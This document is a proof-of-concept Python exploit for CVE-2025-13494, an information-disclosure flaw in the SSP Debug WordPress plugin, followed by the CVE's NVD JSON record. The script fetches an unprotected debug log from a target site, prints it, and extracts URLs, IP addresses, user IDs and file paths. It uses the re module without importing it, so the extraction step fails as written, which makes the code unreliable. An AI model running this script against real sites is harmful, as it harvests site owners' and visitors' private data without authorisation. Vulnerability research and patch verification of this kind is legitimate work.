CVE-2025-13494

# CVE-2025-13494 PoC - WordPress SSP Debug Sensitive Information Disclosure # Author: Security Researcher # Date: 2025-12-05 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-13494 """ # Construct the path to the debug log file log_path = "/wp-content/uploads/ssp-debug/ssp-debug.log" full_url = target_url.rstrip('/') + log_path print(f"[*] Target: {target_url}") print(f"[*] Checking log file: {full_url}") try: response = requests.get(full_url, timeout=10) if response.status_code == 200: print("[!] VULNERABLE - Log file is accessible!") print(f"[+] Content length: {len(response.text)} bytes") print("\n[+] Log file contents (first 2000 chars):") print("-" * 50) print(response.text[:2000]) # Search for sensitive information patterns sensitive_patterns = { 'URLs': r'https?://[^\s]+', 'IP Addresses': r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', 'User IDs': r'user[_\s]?id[^"]*[:=][^",]+', 'File Paths': r'/[a-zA-Z0-9_/\-\.]+' } print("\n[+] Extracted sensitive information:") for pattern_name, pattern in sensitive_patterns.items(): matches = set(re.findall(pattern, response.text, re.IGNORECASE)) if matches: print(f" {pattern_name}: {len(matches)} found") return True elif response.status_code == 403: print("[-] Access forbidden - may be patched or protected") return False else: print(f"[-] Log file not found (HTTP {response.status_code})") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter target URL: ").strip() check_vulnerability(target) # Usage: python cve-2025-13494.py https://example.com

{"cve": {"id": "CVE-2025-13494", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:58.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SSP Debug plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0. This is due to the plugin storing PHP error logs in a predictable, web-accessible location (wp-content/uploads/ssp-debug/ssp-debug.log) without any access controls. This makes it possible for unauthenticated attackers to view sensitive debugging information including full URLs, client IP addresses, User-Agent strings, WordPress user IDs, and internal filesystem paths."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ssp-debugging/tags/1.0.0/ssp-debug.php#L221", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ssp-debugging/trunk/ssp-debug.php#L221", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66f29499-1522-43cd-af78-9b734c66af8c?source=cve", "source": "[email protected]"}]}}